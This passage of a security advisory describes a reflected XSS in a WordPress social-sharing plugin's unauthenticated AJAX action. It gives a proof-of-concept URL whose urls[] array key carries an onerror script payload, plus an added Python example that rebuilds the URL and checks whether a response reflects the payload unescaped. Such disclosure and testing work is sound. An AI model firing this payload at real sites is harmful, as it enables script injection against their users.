PoC URL (uses the unauthenticated AJAX action "heateor_sss_sharing_count"; the payload is supplied as the key of the urls[] request array and is reflected in the response):
http://WORDPRESS_DOMAIN_HERE/wp-admin/admin-ajax.php?action=heateor_sss_sharing_count&urls[<img%20src%3dx%20onerror%3dalert(document.domain)>]=

Other AJAX actions of the plugin (those requiring authentication) may also be vulnerable to reflected XSS, but they were not tested.
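The following is an added example, not code from the advisory or from the plugin. It rebuilds the PoC URL above with the payload fully percent-encoded, models the reflection that makes an admin-ajax.php response exploitable with two stand-in handlers (one unescaped, one hardened; both are assumptions about behaviour, not the plugin's code), and gives a checker a tester can run over a captured response to decide whether the reflection is actually a reflected XSS rather than a harmless escaped echo.

```python
"""Added example: rebuild the PoC URL and check a response for unescaped
reflection of the urls[] array key. Not the advisory's or the plugin's code."""
import html
import json
from urllib.parse import quote

ACTION = "heateor_sss_sharing_count"
# Payload from the advisory's PoC. Note that it is the KEY of the urls[]
# array that carries it, so the value after '=' can stay empty.
PAYLOAD = "<img src=x onerror=alert(document.domain)>"


def build_poc_url(base_url: str, payload: str = PAYLOAD) -> str:
    """Reproduce the advisory's PoC URL with the key percent-encoded.

    The advisory only encodes spaces and '='; encoding every reserved
    character is safer for curl/requests and decodes to the same array
    key on the PHP side.
    """
    return (f"{base_url}/wp-admin/admin-ajax.php?action={ACTION}"
            f"&urls[{quote(payload, safe='')}]=")


def simulated_vulnerable_handler(urls: dict) -> tuple[str, str]:
    """Stand-in (assumption) for an unescaped reflection.

    The request's array keys are echoed into the body. Like PHP's
    json_encode(), json.dumps() leaves '<' and '>' untouched, and
    admin-ajax.php serves text/html unless the handler sets a type, so
    a browser renders the echoed key as markup.
    """
    body = json.dumps({u: 0 for u in urls})
    return "text/html; charset=UTF-8", body


def simulated_fixed_handler(urls: dict) -> tuple[str, str]:
    """Hardened stand-in: HTML-escape each key and send a JSON type."""
    body = json.dumps({html.escape(u, quote=True): 0 for u in urls})
    return "application/json; charset=UTF-8", body


def reflects_unescaped(content_type: str, body: str,
                       payload: str = PAYLOAD) -> bool:
    """True only if the payload survives verbatim (no entity encoding of
    '<', '>' or quotes) AND the response will be rendered as HTML.

    An escaped echo, or a verbatim echo served as application/json, is
    not a reflected XSS and should not be reported as one.
    """
    mime = content_type.split(";")[0].strip().lower()
    return mime == "text/html" and payload in body


if __name__ == "__main__":
    print(build_poc_url("http://WORDPRESS_DOMAIN_HERE"))
    for name, handler in (("vulnerable", simulated_vulnerable_handler),
                          ("fixed", simulated_fixed_handler)):
        ct, body = handler({PAYLOAD: ""})
        print(f"{name:10s} {ct!r:32s} xss={reflects_unescaped(ct, body)}")
```

When testing a live target, capture the Content-Type header together with the body: a response that echoes the key verbatim but is served as application/json only becomes a finding if some page embeds that response into the DOM unescaped, which this advisory does not claim.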